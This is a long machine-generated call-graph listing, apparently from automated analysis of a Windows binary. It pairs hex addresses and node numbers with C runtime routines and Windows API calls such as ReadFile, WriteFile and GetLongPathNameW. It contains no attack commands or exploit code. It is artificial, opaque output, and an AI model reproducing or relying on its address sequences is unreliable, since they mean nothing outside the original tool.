__alloc_osfhnd 98488->98491 98489 775a9b 98501 778d68 58 API calls __getptd_noexit 98489->98501 98491->98489 98492 775ac1 98491->98492 98503 776e4e 98492->98503 98493 775aa0 98502 778ff6 9 API calls __fclose_nolock 98493->98502 98496 775ac7 98509 7759ee 83 API calls 5 library calls 98496->98509 98497 775aab __alloc_osfhnd 98497->98486 98499 775ad6 98510 775af8 LeaveCriticalSection LeaveCriticalSection _fprintf 98499->98510 98501->98493 98502->98497 98504 776e80 EnterCriticalSection 98503->98504 98505 776e5e 98503->98505 98506 776e76 98504->98506 98505->98504 98507 776e66 98505->98507 98506->98496 98508 779e4b __lock 58 API calls 98507->98508 98508->98506 98509->98499 98510->98497 98514 77582d 98511->98514 98513 75508e 98513->98299 98515 775839 __alloc_osfhnd 98514->98515 98516 77584f _memset 98515->98516 98517 77587c 98515->98517 98518 775874 __alloc_osfhnd 98515->98518 98541 778d68 58 API calls __getptd_noexit 98516->98541 98519 776e4e __lock_file 59 API calls 98517->98519 98518->98513 98520 775882 98519->98520 98527 77564d 98520->98527 98523 775869 98542 778ff6 9 API calls __fclose_nolock 98523->98542 98528 775683 98527->98528 98531 775668 _memset 98527->98531 98543 7758b6 LeaveCriticalSection LeaveCriticalSection _fprintf 98528->98543 98529 775673 98639 778d68 58 API calls __getptd_noexit 98529->98639 98531->98528 98531->98529 98534 7756c3 98531->98534 98534->98528 98537 7757d4 _memset 98534->98537 98544 774916 98534->98544 98551 7810ab 98534->98551 98619 780df7 98534->98619 98641 780f18 58 API calls 3 library calls 98534->98641 98642 778d68 58 API calls __getptd_noexit 98537->98642 98540 775678 98640 778ff6 9 API calls __fclose_nolock 98540->98640 98541->98523 98542->98518 98543->98518 98545 774935 98544->98545 98546 774920 98544->98546 98545->98534 98643 778d68 58 API calls __getptd_noexit 98546->98643 98548 774925 98644 778ff6 9 API calls __fclose_nolock 98548->98644 98550 774930 98550->98534 98552 7810cc 98551->98552 98553 7810e3 98551->98553 98654 778d34 58 API calls __getptd_noexit 98552->98654 98554 78181b 98553->98554 98558 78111d 98553->98558 98670 778d34 58 API calls __getptd_noexit 98554->98670 98557 7810d1 98655 778d68 58 API calls __getptd_noexit 98557->98655 98561 781125 98558->98561 98568 78113c 98558->98568 98559 781820 98671 778d68 58 API calls __getptd_noexit 98559->98671 98656 778d34 58 API calls __getptd_noexit 98561->98656 98564 781131 98672 778ff6 9 API calls __fclose_nolock 98564->98672 98565 7810d8 98565->98534 98566 78112a 98657 778d68 58 API calls __getptd_noexit 98566->98657 98568->98565 98569 781151 98568->98569 98570 78116b 98568->98570 98574 781189 98568->98574 98658 778d34 58 API calls __getptd_noexit 98569->98658 98570->98569 98573 781176 98570->98573 98645 785ebb 98573->98645 98659 778a5d 58 API calls 2 library calls 98574->98659 98576 781199 98578 7811bc 98576->98578 98579 7811a1 98576->98579 98662 781b11 60 API calls 3 library calls 98578->98662 98660 778d68 58 API calls __getptd_noexit 98579->98660 98580 78128a 98583 781303 ReadFile 98580->98583 98584 7812a0 GetConsoleMode 98580->98584 98586 7817e3 GetLastError 98583->98586 98592 781325 98583->98592 98587 781300 98584->98587 98588 7812b4 98584->98588 98585 7811a6 98661 778d34 58 API calls __getptd_noexit 98585->98661 98590 7817f0 98586->98590 98591 7812e3 98586->98591 98587->98583 98588->98587 98593 7812ba ReadConsoleW 98588->98593 98668 778d68 58 API calls __getptd_noexit 98590->98668 98601 7812e9 98591->98601 98663 778d47 58 API calls 2 library calls 98591->98663 98592->98586 98595 7812f5 98592->98595 98593->98595 98596 7812dd GetLastError 98593->98596 98595->98601 98603 78135a 98595->98603 98606 7815c7 98595->98606 98596->98591 98598 7817f5 98669 778d34 58 API calls __getptd_noexit 98598->98669 98600 772f95 _free 58 API calls 98600->98565 98601->98565 98601->98600 98604 7813c6 ReadFile 98603->98604 98612 781447 98603->98612 98607 7813e7 GetLastError 98604->98607 98618 7813f1 98604->98618 98605 7816cd ReadFile 98611 7816f0 GetLastError 98605->98611 98617 7816fe 98605->98617 98606->98601 98606->98605 98607->98618 98608 781504 98613 7814b4 MultiByteToWideChar 98608->98613 98666 781b11 60 API calls 3 library calls 98608->98666 98609 7814f4 98665 778d68 58 API calls __getptd_noexit 98609->98665 98611->98617 98612->98601 98612->98608 98612->98609 98612->98613 98613->98596 98613->98601 98617->98606 98667 781b11 60 API calls 3 library calls 98617->98667 98618->98603 98664 781b11 60 API calls 3 library calls 98618->98664 98620 780e02 98619->98620 98623 780e17 98619->98623 98706 778d68 58 API calls __getptd_noexit 98620->98706 98622 780e07 98707 778ff6 9 API calls __fclose_nolock 98622->98707 98626 780e4c 98623->98626 98633 780e12 98623->98633 98708 786234 58 API calls __malloc_crt 98623->98708 98627 774916 __fputwc_nolock 58 API calls 98626->98627 98628 780e60 98627->98628 98673 780f97 98628->98673 98630 780e67 98631 774916 __fputwc_nolock 58 API calls 98630->98631 98630->98633 98632 780e8a 98631->98632 98632->98633 98634 774916 __fputwc_nolock 58 API calls 98632->98634 98633->98534 98635 780e96 98634->98635 98635->98633 98636 774916 __fputwc_nolock 58 API calls 98635->98636 98637 780ea3 98636->98637 98638 774916 __fputwc_nolock 58 API calls 98637->98638 98638->98633 98639->98540 98640->98528 98641->98534 98642->98540 98643->98548 98644->98550 98646 785ed3 98645->98646 98647 785ec6 98645->98647 98649 785edf 98646->98649 98650 778d68 __fclose_nolock 58 API calls 98646->98650 98648 778d68 __fclose_nolock 58 API calls 98647->98648 98651 785ecb 98648->98651 98649->98580 98652 785f00 98650->98652 98651->98580 98653 778ff6 __fclose_nolock 9 API calls 98652->98653 98653->98651 98654->98557 98655->98565 98656->98566 98657->98564 98658->98566 98659->98576 98660->98585 98661->98565 98662->98573 98663->98601 98664->98618 98665->98601 98666->98613 98667->98617 98668->98598 98669->98601 98670->98559 98671->98564 98672->98565 98674 780fa3 __alloc_osfhnd 98673->98674 98675 780fb0 98674->98675 98676 780fc7 98674->98676 98677 778d34 __dosmaperr 58 API calls 98675->98677 98678 78108b 98676->98678 98681 780fdb 98676->98681 98680 780fb5 98677->98680 98679 778d34 __dosmaperr 58 API calls 98678->98679 98682 780ffe 98679->98682 98683 778d68 __fclose_nolock 58 API calls 98680->98683 98684 780ff9 98681->98684 98685 781006 98681->98685 98690 778d68 __fclose_nolock 58 API calls 98682->98690 98698 780fbc __alloc_osfhnd 98683->98698 98686 778d34 __dosmaperr 58 API calls 98684->98686 98687 781028 98685->98687 98688 781013 98685->98688 98686->98682 98689 77d446 ___lock_fhandle 59 API calls 98687->98689 98691 778d34 __dosmaperr 58 API calls 98688->98691 98693 78102e 98689->98693 98694 781020 98690->98694 98692 781018 98691->98692 98695 778d68 __fclose_nolock 58 API calls 98692->98695 98696 781041 98693->98696 98697 781054 98693->98697 98700 778ff6 __fclose_nolock 9 API calls 98694->98700 98695->98694 98699 7810ab __read_nolock 70 API calls 98696->98699 98701 778d68 __fclose_nolock 58 API calls 98697->98701 98698->98630 98702 78104d 98699->98702 98700->98698 98703 781059 98701->98703 98705 781083 __read LeaveCriticalSection 98702->98705 98704 778d34 __dosmaperr 58 API calls 98703->98704 98704->98702 98705->98698 98706->98622 98707->98633 98708->98626 98712 77543a GetSystemTimeAsFileTime 98709->98712 98711 7b91f8 98711->98301 98713 775468 __aulldiv 98712->98713 98713->98711 98715 775e9c __alloc_osfhnd 98714->98715 98716 775ec3 98715->98716 98717 775eae 98715->98717 98718 776e4e __lock_file 59 API calls 98716->98718 98728 778d68 58 API calls __getptd_noexit 98717->98728 98720 775ec9 98718->98720 98730 775b00 67 API calls 5 library calls 98720->98730 98721 775eb3 98729 778ff6 9 API calls __fclose_nolock 98721->98729 98724 775ed4 98731 775ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 98724->98731 98726 775ee6 98727 775ebe __alloc_osfhnd 98726->98727 98727->98306 98728->98721 98729->98727 98730->98724 98731->98726 98732->98163 98733->98171 98734->98185 98735->98187 98736->98184 98737->98192 98739 7592c9 Mailbox 98738->98739 98740 78f5c8 98739->98740 98744 7592d3 98739->98744 98742 770ff6 Mailbox 59 API calls 98740->98742 98741 7592da 98741->98196 98743 78f5d4 98742->98743 98744->98741 98746 759df0 59 API calls Mailbox 98744->98746 98746->98744 98747->98203 98748->98200 98754 7b99d2 __tzset_nolock _wcscmp 98749->98754 98750 75506b 74 API calls 98750->98754 98751 7b9866 98751->98213 98751->98242 98752 7b9393 GetSystemTimeAsFileTime 98752->98754 98753 755045 85 API calls 98753->98754 98754->98750 98754->98751 98754->98752 98754->98753 98756 7b8d9b 98755->98756 98757 7b8da9 98755->98757 98758 77548b 115 API calls 98756->98758 98759 7b8dee 98757->98759 98760 77548b 115 API calls 98757->98760 98782 7b8db2 98757->98782 98758->98757 98786 7b901b 98759->98786 98761 7b8dd3 98760->98761 98761->98759 98763 7b8ddc 98761->98763 98767 7755d6 __fcloseall 83 API calls 98763->98767 98763->98782 98764 7b8e32 98765 7b8e57 98764->98765 98766 7b8e36 98764->98766 98790 7b8c33 98765->98790 98769 7b8e43 98766->98769 98771 7755d6 __fcloseall 83 API calls 98766->98771 98767->98782 98772 7755d6 __fcloseall 83 API calls 98769->98772 98769->98782 98771->98769 98772->98782 98773 7b8e85 98799 7b8eb5 98773->98799 98774 7b8e65 98776 7b8e72 98774->98776 98778 7755d6 __fcloseall 83 API calls 98774->98778 98780 7755d6 __fcloseall 83 API calls 98776->98780 98776->98782 98778->98776 98780->98782 98782->98241 98783 7b8ea0 98783->98782 98785 7755d6 __fcloseall 83 API calls 98783->98785 98785->98782 98787 7b9040 98786->98787 98789 7b9029 __tzset_nolock _memmove 98786->98789 98788 775812 __fread_nolock 74 API calls 98787->98788 98788->98789 98789->98764 98791 77594c __malloc_crt 58 API calls 98790->98791 98792 7b8c42 98791->98792 98793 77594c __malloc_crt 58 API calls 98792->98793 98794 7b8c56 98793->98794 98795 77594c __malloc_crt 58 API calls 98794->98795 98796 7b8c6a 98795->98796 98797 7b8f97 58 API calls 98796->98797 98798 7b8c7d 98796->98798 98797->98798 98798->98773 98798->98774 98805 7b8eca 98799->98805 98800 7b8f82 98832 7b91bf 98800->98832 98802 7b8c8f 74 API calls 98802->98805 98805->98800 98805->98802 98806 7b8e8c 98805->98806 98828 7b909c 98805->98828 98836 7b8d2b 74 API calls 98805->98836 98807 7b8f97 98806->98807 98808 7b8faa 98807->98808 98809 7b8fa4 98807->98809 98811 7b8fbb 98808->98811 98813 772f95 _free 58 API calls 98808->98813 98810 772f95 _free 58 API calls 98809->98810 98810->98808 98812 7b8e93 98811->98812 98814 772f95 _free 58 API calls 98811->98814 98812->98783 98815 7755d6 98812->98815 98813->98811 98814->98812 98816 7755e2 __alloc_osfhnd 98815->98816 98817 7755f6 98816->98817 98818 77560e 98816->98818 98885 778d68 58 API calls __getptd_noexit 98817->98885 98820 775606 __alloc_osfhnd 98818->98820 98821 776e4e __lock_file 59 API calls 98818->98821 98820->98783 98823 775620 98821->98823 98822 7755fb 98886 778ff6 9 API calls __fclose_nolock 98822->98886 98869 77556a 98823->98869 98829 7b90ab 98828->98829 98830 7b90eb 98828->98830 98829->98805 98830->98829 98837 7b9172 98830->98837 98833 7b91cc 98832->98833 98834 7b91dd 98832->98834 98835 774a93 80 API calls 98833->98835 98834->98806 98835->98834 98836->98805 98838 7b91af 98837->98838 98839 7b919e 98837->98839 98838->98830 98841 774a93 98839->98841 98842 774a9f __alloc_osfhnd 98841->98842 98843 774ad5 98842->98843 98844 774abd 98842->98844 98846 774acd __alloc_osfhnd 98842->98846 98847 776e4e __lock_file 59 API calls 98843->98847 98866 778d68 58 API calls __getptd_noexit 98844->98866 98846->98838 98849 774adb 98847->98849 98848 774ac2 98867 778ff6 9 API calls __fclose_nolock 98848->98867 98854 77493a 98849->98854 98855 774949 98854->98855 98860 774967 98854->98860 98856 774957 98855->98856 98855->98860 98864 774981 _memmove 98855->98864 98857 778d68 __fclose_nolock 58 API calls 98856->98857 98858 77495c 98857->98858 98859 778ff6 __fclose_nolock 9 API calls 98858->98859 98859->98860 98868 774b0d LeaveCriticalSection LeaveCriticalSection _fprintf 98860->98868 98861 77b05e __flsbuf 78 API calls 98861->98864 98862 774c6d __flush 78 API calls 98862->98864 98863 774916 __fputwc_nolock 58 API calls 98863->98864 98864->98860 98864->98861 98864->98862 98864->98863 98865 77dac6 __write 78 API calls 98864->98865 98865->98864 98866->98848 98867->98846 98868->98846 98870 77558d 98869->98870 98871 775579 98869->98871 98877 775589 98870->98877 98888 774c6d 98870->98888 98924 778d68 58 API calls __getptd_noexit 98871->98924 98873 77557e 98925 778ff6 9 API calls __fclose_nolock 98873->98925 98887 775645 LeaveCriticalSection LeaveCriticalSection _fprintf 98877->98887 98880 774916 __fputwc_nolock 58 API calls 98881 7755a7 98880->98881 98898 780c52 98881->98898 98883 7755ad 98883->98877 98884 772f95 _free 58 API calls 98883->98884 98884->98877 98885->98822 98886->98820 98887->98820 98889 774c80 98888->98889 98890 774ca4 98888->98890 98889->98890 98891 774916 __fputwc_nolock 58 API calls 98889->98891 98894 780dc7 98890->98894 98892 774c9d 98891->98892 98926 77dac6 98892->98926 98895 7755a1 98894->98895 98896 780dd4 98894->98896 98895->98880 98896->98895 98897 772f95 _free 58 API calls 98896->98897 98897->98895 98899 780c5e __alloc_osfhnd 98898->98899 98900 780c6b 98899->98900 98901 780c82 98899->98901 99051 778d34 58 API calls __getptd_noexit 98900->99051 98903 780d0d 98901->98903 98905 780c92 98901->98905 99056 778d34 58 API calls __getptd_noexit 98903->99056 98904 780c70 99052 778d68 58 API calls __getptd_noexit 98904->99052 98908 780cba 98905->98908 98909 780cb0 98905->98909 98912 77d446 ___lock_fhandle 59 API calls 98908->98912 99053 778d34 58 API calls __getptd_noexit 98909->99053 98910 780cb5 99057 778d68 58 API calls __getptd_noexit 98910->99057 98913 780cc0 98912->98913 98915 780cde 98913->98915 98916 780cd3 98913->98916 99054 778d68 58 API calls __getptd_noexit 98915->99054 99036 780d2d 98916->99036 98917 780d19 99058 778ff6 9 API calls __fclose_nolock 98917->99058 98920 780c77 __alloc_osfhnd 98920->98883 98922 780cd9 99055 780d05 LeaveCriticalSection __unlock_fhandle 98922->99055 98924->98873 98925->98877 98927 77dad2 __alloc_osfhnd 98926->98927 98928 77daf6 98927->98928 98929 77dadf 98927->98929 98930 77db95 98928->98930 98932 77db0a 98928->98932 99027 778d34 58 API calls __getptd_noexit 98929->99027 99033 778d34 58 API calls __getptd_noexit 98930->99033 98935 77db32 98932->98935 98936 77db28 98932->98936 98934 77dae4 99028 778d68 58 API calls __getptd_noexit 98934->99028 98954 77d446 98935->98954 99029 778d34 58 API calls __getptd_noexit 98936->99029 98937 77db2d 99034 778d68 58 API calls __getptd_noexit 98937->99034 98939 77daeb __alloc_osfhnd 98939->98890 98942 77db38 98944 77db5e 98942->98944 98945 77db4b 98942->98945 99030 778d68 58 API calls __getptd_noexit 98944->99030 98963 77dbb5 98945->98963 98946 77dba1 99035 778ff6 9 API calls __fclose_nolock 98946->99035 98950 77db57 99032 77db8d LeaveCriticalSection __unlock_fhandle 98950->99032 98951 77db63 99031 778d34 58 API calls __getptd_noexit 98951->99031 98955 77d452 __alloc_osfhnd 98954->98955 98956 77d4a1 EnterCriticalSection 98955->98956 98957 779e4b __lock 58 API calls 98955->98957 98958 77d4c7 __alloc_osfhnd 98956->98958 98959 77d477 98957->98959 98958->98942 98960 77d48f 98959->98960 98961 77a06b __alloc_osfhnd InitializeCriticalSectionAndSpinCount 98959->98961 98962 77d4cb ___lock_fhandle LeaveCriticalSection 98960->98962 98961->98960 98962->98956 98964 77dbc2 __ftell_nolock 98963->98964 98965 77dc01 98964->98965 98966 77dc20 98964->98966 98994 77dbf6 98964->98994 98968 778d34 __dosmaperr 58 API calls 98965->98968 98969 77dc78 98966->98969 98970 77dc5c 98966->98970 98967 77c836 __fputwc_nolock 6 API calls 98971 77e416 98967->98971 98972 77dc06 98968->98972 98974 77dc91 98969->98974 98977 781b11 __lseeki64_nolock 60 API calls 98969->98977 98973 778d34 __dosmaperr 58 API calls 98970->98973 98971->98950 98975 778d68 __fclose_nolock 58 API calls 98972->98975 98976 77dc61 98973->98976 98979 785ebb __flsbuf 58 API calls 98974->98979 98978 77dc0d 98975->98978 98980 778d68 __fclose_nolock 58 API calls 98976->98980 98977->98974 98981 778ff6 __fclose_nolock 9 API calls 98978->98981 98982 77dc9f 98979->98982 98984 77dc68 98980->98984 98981->98994 98983 77dff8 98982->98983 98988 779bec __setmbcp 58 API calls 98982->98988 98985 77e016 98983->98985 98986 77e38b WriteFile 98983->98986 98987 778ff6 __fclose_nolock 9 API calls 98984->98987 98989 77e13a 98985->98989 98997 77e02c 98985->98997 98990 77dfeb GetLastError 98986->98990 98995 77dfb8 98986->98995 98987->98994 98991 77dccb GetConsoleMode 98988->98991 99001 77e22f 98989->99001 99003 77e145 98989->99003 98990->98995 98991->98983 98993 77dd0a 98991->98993 98992 77e3c4 98992->98994 98999 778d68 __fclose_nolock 58 API calls 98992->98999 98993->98983 98996 77dd1a GetConsoleCP 98993->98996 98994->98967 98995->98992 98995->98994 99000 77e118 98995->99000 98996->98992 99024 77dd49 98996->99024 98997->98992 98998 77e09b WriteFile 98997->98998 98998->98990 99002 77e0d8 98998->99002 99004 77e3f2 98999->99004 99005 77e123 99000->99005 99006 77e3bb 99000->99006 99001->98992 99007 77e2a4 WideCharToMultiByte 99001->99007 99002->98997 99008 77e0fc 99002->99008 99003->98992 99009 77e1aa WriteFile 99003->99009 99010 778d34 __dosmaperr 58 API calls 99004->99010 99012 778d68 __fclose_nolock 58 API calls 99005->99012 99013 778d47 __dosmaperr 58 API calls 99006->99013 99007->98990 99019 77e2eb 99007->99019 99008->98995 99009->98990 99011 77e1f9 99009->99011 99010->98994 99011->98995 99011->99003 99011->99008 99014 77e128 99012->99014 99013->98994 99016 778d34 __dosmaperr 58 API calls 99014->99016 99015 77e2f3 WriteFile 99018 77e346 GetLastError 99015->99018 99015->99019 99016->98994 99017 773835 __write_nolock 58 API calls 99017->99024 99018->99019 99019->98995 99019->99001 99019->99008 99019->99015 99020 78650a 60 API calls __write_nolock 99020->99024 99021 787cae WriteConsoleW CreateFileW __putwch_nolock 99025 77de9f 99021->99025 99022 77de32 WideCharToMultiByte 99022->98995 99023 77de6d WriteFile 99022->99023 99023->98990 99023->99025 99024->98995 99024->99017 99024->99020 99024->99022 99024->99025 99025->98990 99025->98995 99025->99021 99025->99024 99026 77dec7 WriteFile 99025->99026 99026->98990 99026->99025 99027->98934 99028->98939 99029->98937 99030->98951 99031->98950 99032->98939 99033->98937 99034->98946 99035->98939 99059 77d703 99036->99059 99038 780d91 99072 77d67d 59 API calls 2 library calls 99038->99072 99040 780d3b 99040->99038 99041 780d6f 99040->99041 99043 77d703 __lseeki64_nolock 58 API calls 99040->99043 99041->99038 99044 77d703 __lseeki64_nolock 58 API calls 99041->99044 99042 780d99 99045 780dbb 99042->99045 99073 778d47 58 API calls 2 library calls 99042->99073 99046 780d66 99043->99046 99047 780d7b CloseHandle 99044->99047 99045->98922 99050 77d703 __lseeki64_nolock 58 API calls 99046->99050 99047->99038 99048 780d87 GetLastError 99047->99048 99048->99038 99050->99041 99051->98904 99052->98920 99053->98910 99054->98922 99055->98920 99056->98910 99057->98917 99058->98920 99060 77d723 99059->99060 99061 77d70e 99059->99061 99063 778d34 __dosmaperr 58 API calls 99060->99063 99066 77d748 99060->99066 99062 778d34 __dosmaperr 58 API calls 99061->99062 99064 77d713 99062->99064 99067 77d752 99063->99067 99065 778d68 __fclose_nolock 58 API calls 99064->99065 99068 77d71b 99065->99068 99066->99040 99069 778d68 __fclose_nolock 58 API calls 99067->99069 99068->99040 99070 77d75a 99069->99070 99071 778ff6 __fclose_nolock 9 API calls 99070->99071 99071->99068 99072->99042 99073->99045 99136 781b90 99074->99136 99077 7548f7 99138 757eec 99077->99138 99078 7548da 99079 757d2c 59 API calls 99078->99079 99081 7548e6 99079->99081 99082 757886 59 API calls 99081->99082 99083 7548f2 99082->99083 99084 7709d5 99083->99084 99085 781b90 __ftell_nolock 99084->99085 99086 7709e2 GetLongPathNameW 99085->99086 99087 757d2c 59 API calls 99086->99087 99088 75741d 99087->99088 99089 75716b 99088->99089 99090 7577c7 59 API calls 99089->99090 99091 75717d 99090->99091 99092 7548ae 60 API calls 99091->99092 99093 757188 99092->99093 99094 757193 99093->99094 99099 78ecae 99093->99099 99095 753f84 59 API calls 99094->99095 99097 75719f 99095->99097 99142 7534c2 99097->99142 99098 78ecc8 99099->99098 99148 757a68 61 API calls 99099->99148 99101 7571b2 Mailbox 99101->97978 99103 754f3d 136 API calls 99102->99103 99104 7569ef 99103->99104 99105 78e45a 99104->99105 99106 754f3d 136 API calls 99104->99106 99107 7b97e5 122 API calls 99105->99107 99108 756a03 99106->99108 99109 78e46f 99107->99109 99108->99105 99110 756a0b 99108->99110 99111 78e490 99109->99111 99112 78e473 99109->99112 99115 756a17 99110->99115 99116 78e47b 99110->99116 99114 770ff6 Mailbox 59 API calls 99111->99114 99113 754faa 84 API calls 99112->99113 99113->99116 99135 78e4d5 Mailbox 99114->99135 99149 756bec 99115->99149 99242 7b4534 90 API calls _wprintf 99116->99242 99119 78e489 99119->99111 99121 78e689 99122 772f95 _free 58 API calls 99121->99122 99123 78e691 99122->99123 99124 754faa 84 API calls 99123->99124 99129 78e69a 99124->99129 99128 772f95 _free 58 API calls 99128->99129 99129->99128 99131 754faa 84 API calls 99129->99131 99248 7afcb1 89 API calls 4 library calls 99129->99248 99131->99129 99132 757f41 59 API calls 99132->99135 99135->99121 99135->99129 99135->99132 99243 7afc4d 59 API calls 2 library calls 99135->99243 99244 7afb6e 61 API calls 2 library calls 99135->99244 99245 7b7621 59 API calls Mailbox 99135->99245 99246 75766f 59 API calls 2 library calls 99135->99246 99247 7574bd 59 API calls Mailbox 99135->99247 99137 7548bb GetFullPathNameW 99136->99137 99137->99077 99137->99078 99139 757f06 99138->99139 99140 757ef9 99138->99140 99141 770ff6 Mailbox 59 API calls 99139->99141 99140->99081 99141->99140 99143 7534d4 99142->99143 99147 7534f3 _memmove 99142->99147 99145 770ff6 Mailbox 59 API calls 99143->99145 99144 770ff6 Mailbox 59 API calls 99146 75350a 99144->99146 99145->99147 99146->99101 99147->99144 99148->99099 99150 756c15 99149->99150 99151 78e847 99149->99151 99254 755906 60 API calls Mailbox 99150->99254 99321 7afcb1 89 API calls 4 library calls 99151->99321 99154 756c37 99255 755956 67 API calls 99154->99255 99155 78e85a 99322 7afcb1 89 API calls 4 library calls 99155->99322 99157 756c4c 99157->99155 99158 756c54 99157->99158 99160 7577c7 59 API calls 99158->99160 99162 756c60 99160->99162 99161 78e876 99190 756cc1 99161->99190 99256 770b9b 60 API calls __ftell_nolock 99162->99256 99164 78e889 99167 755dcf CloseHandle 99164->99167 99165 756ccf 99168 7577c7 59 API calls 99165->99168 99166 756c6c 99169 7577c7 59 API calls 99166->99169 99170 78e895 99167->99170 99171 756cd8 99168->99171 99172 756c78 99169->99172 99173 754f3d 136 API calls 99170->99173 99174 7577c7 59 API calls 99171->99174 99175 7548ae 60 API calls 99172->99175 99176 78e8b1 99173->99176 99177 756ce1 99174->99177 99178 756c86 99175->99178 99180 78e8da 99176->99180 99183 7b97e5 122 API calls 99176->99183 99259 7546f9 99177->99259 99257 7559b0 ReadFile SetFilePointerEx 99178->99257 99323 7afcb1 89 API calls 4 library calls 99180->99323 99182 756cb2 99258 755c4e SetFilePointerEx SetFilePointerEx 99182->99258 99187 78e8cd 99183->99187 99184 756cf8 99188 757c8e 59 API calls 99184->99188 99191 78e8d5 99187->99191 99192 78e8f6 99187->99192 99193 756d09 SetCurrentDirectoryW 99188->99193 99189 78e8f1 99219 756e6c Mailbox 99189->99219 99190->99164 99190->99165 99194 754faa 84 API calls 99191->99194 99195 754faa 84 API calls 99192->99195 99198 756d1c Mailbox 99193->99198 99194->99180 99196 78e8fb 99195->99196 99197 770ff6 Mailbox 59 API calls 99196->99197 99204 78e92f 99197->99204 99200 770ff6 Mailbox 59 API calls 99198->99200 99202 756d2f 99200->99202 99201 753bcd 99201->97837 99201->97845 99203 75538e 59 API calls 99202->99203 99231 756d3a Mailbox __wsetenvp 99203->99231 99324 75766f 59 API calls 2 library calls 99204->99324 99206 756e47 99317 755dcf 99206->99317 99209 78eb69 99330 7b7581 59 API calls Mailbox 99209->99330 99210 756e53 SetCurrentDirectoryW 99210->99219 99213 78eb8b 99331 7bf835 59 API calls 2 library calls 99213->99331 99216 78eb98 99217 772f95 _free 58 API calls 99216->99217 99217->99219 99218 78ec02 99334 7afcb1 89 API calls 4 library calls 99218->99334 99249 755934 99219->99249 99222 78ec1b 99222->99206 99225 78ebfa 99333 7afb07 59 API calls 4 library calls 99225->99333 99228 757f41 59 API calls 99228->99231 99231->99206 99231->99218 99231->99225 99231->99228 99310 7559cd 67 API calls _wcscpy 99231->99310 99311 7570bd GetStringTypeW 99231->99311 99312 75702c 60 API calls __wcsnicmp 99231->99312 99313 75710a GetStringTypeW __wsetenvp 99231->99313 99314 77387d GetStringTypeW _iswctype 99231->99314 99315 756a3c 165 API calls 3 library calls 99231->99315 99316 757373 59 API calls Mailbox 99231->99316 99232 757f41 59 API calls 99237 78e978 Mailbox 99232->99237 99236 78ebbb 99332 7afcb1 89 API calls 4 library calls 99236->99332 99237->99209 99237->99232 99237->99236 99325 7afc4d 59 API calls 2 library calls 99237->99325 99326 7afb6e 61 API calls 2 library calls 99237->99326 99327 7b7621 59 API calls Mailbox 99237->99327 99328 75766f 59 API calls 2 library calls 99237->99328 99329 757373 59 API calls Mailbox 99237->99329 99239 78ebd4 99240 772f95 _free 58 API calls 99239->99240 99241 78ebe7 99240->99241 99241->99219 99242->99119 99243->99135 99244->99135 99245->99135 99246->99135 99247->99135 99248->99129 99250 755dcf CloseHandle 99249->99250 99251 75593c Mailbox 99250->99251 99252 755dcf CloseHandle 99251->99252 99253 75594b 99252->99253 99253->99201 99254->99154 99255->99157 99256->99166 99257->99182 99258->99190 99260 7577c7 59 API calls 99259->99260 99261 75470f 99260->99261 99262 7577c7 59 API calls 99261->99262 99263 754717 99262->99263 99264 7577c7 59 API calls 99263->99264 99265 75471f 99264->99265 99266 7577c7 59 API calls 99265->99266 99267 754727 99266->99267 99268 78d8fb 99267->99268 99269 75475b 99267->99269 99270 7581a7 59 API calls 99268->99270 99271 7579ab 59 API calls 99269->99271 99272 78d904 99270->99272 99273 754769 99271->99273 99274 757eec 59 API calls 99272->99274 99275 757e8c 59 API calls 99273->99275 99278 75479e 99274->99278 99276 754773 99275->99276 99276->99278 99279 7579ab 59 API calls 99276->99279 99277 7547de 99335 7579ab 99277->99335 99278->99277 99281 7547bd 99278->99281 99291 78d924 99278->99291 99282 754794 99279->99282 99285 757b52 59 API calls 99281->99285 99284 757e8c 59 API calls 99282->99284 99283 78d9f4 99287 757d2c 59 API calls 99283->99287 99284->99278 99288 7547c7 99285->99288 99286 7547ef 99289 754801 99286->99289 99292 7581a7 59 API calls 99286->99292 99305 78d9b1 99287->99305 99288->99277 99296 7579ab 59 API calls 99288->99296 99290 754811 99289->99290 99293 7581a7 59 API calls 99289->99293 99295 754818 99290->99295 99297 7581a7 59 API calls 99290->99297 99291->99283 99294 78d9dd 99291->99294 99303 78d95b 99291->99303 99292->99289 99293->99290 99294->99283 99299 78d9c8 99294->99299 99298 7581a7 59 API calls 99295->99298 99307 75481f Mailbox 99295->99307 99296->99277 99297->99295 99298->99307 99302 757d2c 59 API calls 99299->99302 99300 78d9b9 99301 757d2c 59 API calls 99300->99301 99301->99305 99302->99305 99303->99300 99308 78d9a4 99303->99308 99304 757b52 59 API calls 99304->99305 99305->99277 99305->99304 99348 757a84 59 API calls 2 library calls 99305->99348 99307->99184 99309 757d2c 59 API calls 99308->99309 99309->99305 99310->99231 99311->99231 99312->99231 99313->99231 99314->99231 99315->99231 99316->99231 99318 755dd9 99317->99318 99319 755de8 99317->99319 99318->99210 99319->99318 99320 755ded CloseHandle 99319->99320 99320->99318 99321->99155 99322->99161 99323->99189 99324->99237 99325->99237 99326->99237 99327->99237 99328->99237 99329->99237 99330->99213 99331->99216 99332->99239 99333->99218 99334->99222 99336 757a17 99335->99336 99337 7579ba 99335->99337 99339 757e8c 59 API calls 99336->99339 99337->99336 99338 7579c5 99337->99338 99341 7579e0 99338->99341 99342 78ef32 99338->99342 99340 7579e8 _memmove 99339->99340 99340->99286 99349 758087 59 API calls Mailbox 99341->99349 99343 758189 59 API calls 99342->99343 99345 78ef3c 99343->99345 99346 770ff6 Mailbox 59 API calls 99345->99346 99347 78ef5c 99346->99347 99348->99305 99349->99340 99351 756ef5 99350->99351 99352 757009 99350->99352 99351->99352 99353 770ff6 Mailbox 59 API calls 99351->99353 99352->97984 99355 756f1c 99353->99355 99354 770ff6 Mailbox 59 API calls 99360 756f91 99354->99360 99355->99354 99360->99352 99363 7563a0 99360->99363 99389 7574bd 59 API calls Mailbox 99360->99389 99390 7a6ac9 59 API calls Mailbox 99360->99390 99391 75766f 59 API calls 2 library calls 99360->99391 99361->97987 99362->97989 99392 757b76 99363->99392 99365 7565ca 99399 75766f 59 API calls 2 library calls 99365->99399 99369 78e41f 99402 7afdba 91 API calls 4 library calls 99369->99402 99371 7568f9 99372 7565e4 Mailbox 99371->99372 99404 7afdba 91 API calls 4 library calls 99371->99404 99372->99360 99374 75766f 59 API calls 99384 7563c5 99374->99384 99376 757eec 59 API calls 99376->99384 99377 78e42d 99403 75766f 59 API calls 2 library calls 99377->99403 99379 78e443 99379->99372 99380 78e3bb 99381 758189 59 API calls 99380->99381 99383 78e3c6 99381->99383 99387 770ff6 Mailbox 59 API calls 99383->99387 